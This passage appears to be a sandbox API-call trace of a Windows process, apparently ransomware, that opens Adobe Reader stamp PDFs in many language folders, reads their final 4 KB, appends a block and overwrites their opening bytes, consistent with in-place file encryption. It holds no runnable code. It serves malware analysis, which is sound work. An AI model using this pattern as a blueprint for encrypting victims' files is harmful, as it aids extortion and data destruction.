lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf2c8 [0075.102] ReadFile (in: hFile=0x1d8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.106] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf2c8 [0075.107] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.107] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.107] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.108] CloseHandle (hObject=0x1d8) returned 1 [0075.108] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.109] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.109] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xcdd8 [0075.109] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.109] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.109] ReleaseMutex (hMutex=0x168) returned 1 [0075.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0075.109] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.113] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbdd8 [0075.114] ReadFile (in: hFile=0x1d8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.115] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbdd8 [0075.115] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.116] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.116] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.116] CloseHandle (hObject=0x1d8) returned 1 [0075.117] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.117] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.118] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc0af [0075.118] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.118] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.118] ReleaseMutex (hMutex=0x168) returned 1 [0075.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0075.118] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.121] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xb0af [0075.121] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.124] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xb0af [0075.124] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.124] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.125] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.125] CloseHandle (hObject=0x1d8) returned 1 [0075.125] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.125] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.125] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb7dc [0075.126] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.126] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.126] ReleaseMutex (hMutex=0x168) returned 1 [0075.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0075.126] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.128] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xa7dc [0075.128] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.129] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xa7dc [0075.129] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.130] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.130] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.130] CloseHandle (hObject=0x1d8) returned 1 [0075.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.131] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.131] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa36f [0075.131] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.132] ReleaseMutex (hMutex=0x168) returned 1 [0075.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0075.132] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.133] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x936f [0075.134] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.134] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x936f [0075.135] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.135] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.135] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.135] CloseHandle (hObject=0x1d8) returned 1 [0075.135] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.136] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.136] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xcdd8 [0075.136] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.136] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.137] ReleaseMutex (hMutex=0x168) returned 1 [0075.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0075.137] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.139] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbdd8 [0075.139] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.140] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbdd8 [0075.140] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.141] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.141] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.141] CloseHandle (hObject=0x1d8) returned 1 [0075.142] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.142] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.142] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x44925 [0075.143] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.143] ReleaseMutex (hMutex=0x168) returned 1 [0075.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88a64, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0075.143] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0075.145] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x43925 [0075.145] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.147] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x43925 [0075.147] WriteFile (in: hFile=0x1d8, lpBuffer=0x2669498*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669498*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.147] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.148] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0075.148] CloseHandle (hObject=0x1d8) returned 1 [0075.148] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.149] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.149] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x80f5 [0075.149] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.149] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.149] ReleaseMutex (hMutex=0x168) returned 1 [0075.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0075.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0075.150] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.805] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x70f5 [0075.805] ReadFile (in: hFile=0x1d8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.806] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x70f5 [0075.807] WriteFile (in: hFile=0x1d8, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.807] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.807] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.807] CloseHandle (hObject=0x1d8) returned 1 [0075.808] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.808] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.809] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xcc2c [0075.809] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, 